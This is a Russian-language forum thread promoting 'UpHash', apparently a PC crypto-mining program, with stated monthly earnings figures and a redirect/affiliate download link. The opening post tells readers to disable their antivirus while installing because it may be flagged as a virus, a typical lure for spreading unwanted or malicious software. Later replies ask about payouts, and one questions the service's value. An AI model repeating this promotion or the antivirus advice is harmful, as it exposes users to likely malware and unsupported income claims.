• Добро пожаловать на инвестиционный форум!

    Во всем многообразии инвестиций трудно разобраться. MMGP станет вашим надежным помощником и путеводителем в мире инвестиций. Только самые последние тренды, передовые технологии и новые возможности. 400 тысяч пользователей уже выбрали нас. Самые актуальные новости, проверенные стратегии и способы заработка. Сюда люди приходят поделиться своим опытом, найти и обсудить новые перспективы. 16 миллионов сообщений, оставленных нашими пользователями, содержат их бесценный опыт и знания. Присоединяйтесь и вы!

    Впрочем, для начала надо зарегистрироваться!
  • 🐑 Моисей водил бесплатно. А мы платим, хотя тоже планируем работать 40 лет! Принимай участие в партнеской программе MMGP
  • 📝 Знаешь буквы и умеешь их компоновать? Платим. Дорого. Бессрочная акция от MMGP: "ОПЛАТА ЗА СООБЩЕНИЯ"

UpHash - простой заработок на Windows компьютере.

exmachinarus

Интересующийся
Регистрация
25.09.2017
Сообщения
10
Реакции
3
Поинты
0.000


Появление электронных денег подняло много шума в интернете за последние полгода. Но многие давно от разговоров перешли к действиям: самые смелые уже во всю торгуют, инвестируют и майнят. Причем не только нестабильный биткоин, но и другую крипту. Если вы интересуетесь высокими технологиями, вы наверняка уже в теме. Однако если ваше понимание криптомира всё ещё неполное, и вы не знаете, с чего начать, данный сервис позволит по-новому взглянуть на криптовалюту, узнать простые и быстрые способы заработка с помощью вашего персонального компьютера.

Требования

Всё, что Вам нужно, – компьютер с хорошей графической картой (так как результат майнинга напрямую зависит от мощности вашего устройства). Средний трехлетний компьютер (с процессором Core i7-3770S и видеокарта AMD R9 270) показывает доходность около 30 долларов США в месяц. Компьютер с видеокартой Nvidia GTX 1070 может приносить до 45 долларов США в месяц, а с двумя AMD R9 390 – около 110 долларов США в месяц. На ваш доход также влияет цена криптовалюты, но она постоянно меняется.

В первую очередь нужно определиться с сервисом, с помощью которого вы будете работать. В сети огромное множество примеров, но мы остановимся на наиболее выгодной платформе облачного майнинга. Майнинг платформа Uphash прекрасно подходит как для опытных майнеров, так и для новичков. Не волнуйтесь, все гораздо легче, чем вы думаете.

Для начала, вам нужно зарегистрироваться на официальном сайте. Это и есть первый шаг.

Шаг второй. Загрузите программное обеспечение на свой компьютер.

Шаг третий. Запустите программное обеспечение UpHash, используя данные своего профиля.

На этом все! От вас больше ничего не требуется. Вы можете расслабиться, отдыхать и ни о чём не думать. Только не забудьте включить ваш компьютер, и деньги будут капать на ваш счет. Когда на балансе у вас будет 15 долларов, сможете вывести деньги на вашу карту Visa или MasterCard.

Безусловно, вы на таком доходе не проживете, и больших денег в короткие сроки не заработаете, но это идеальный вариант пассивного дохода. Это безопасно, удобно и доступно для всех.

Не теряйте ни минуты, начинайте зарабатывать!

http://cpatds.pro/?target=-6AAKPUwJIAQAAAAAAAAAAAASW7CZNAAAA



Внимание! Некоторые антивирсные программы могут посчитать данную программу вирусом! Во избежание проблем рекомендуется отключить антивирус на время установки!
 

the machine

Любитель
Регистрация
03.12.2017
Сообщения
594
Реакции
87
Поинты
0.000
А какую валюту майнит?
 

exmachinarus

Интересующийся
Регистрация
25.09.2017
Сообщения
10
Реакции
3
Поинты
0.000
Программа для новичков и полностью автоматическая. Программа майнит самую выгодную в данный момент валюту, но на выходе программа автоматически конвертирует сумму в доллары и выплачивает напрямую на карту!
 

maxonsky

Интересующийся
Регистрация
13.02.2018
Сообщения
7
Реакции
0
Поинты
0.000
И сколько выходит за сутки на i7??
 

udginfess

Интересующийся
Регистрация
14.08.2009
Сообщения
6
Реакции
0
Поинты
0.000
Я конечно, за сервис, но все же он по сравнению с другими аналогами. Что то мало платит на выдаче пула. Очень рекомендую статью о работе, а так же есть полезные статьи

добавлено через 7 минут
Множество систем которые позволяют заработать на майнинге валют. И как бы этот сервис не сильно выгоден. И по отзывам системы https://probtc.info/kategorii/kriptotekhnologii/maining/ его особо не рекомендуют
 
Последнее редактирование:
Сверху Снизу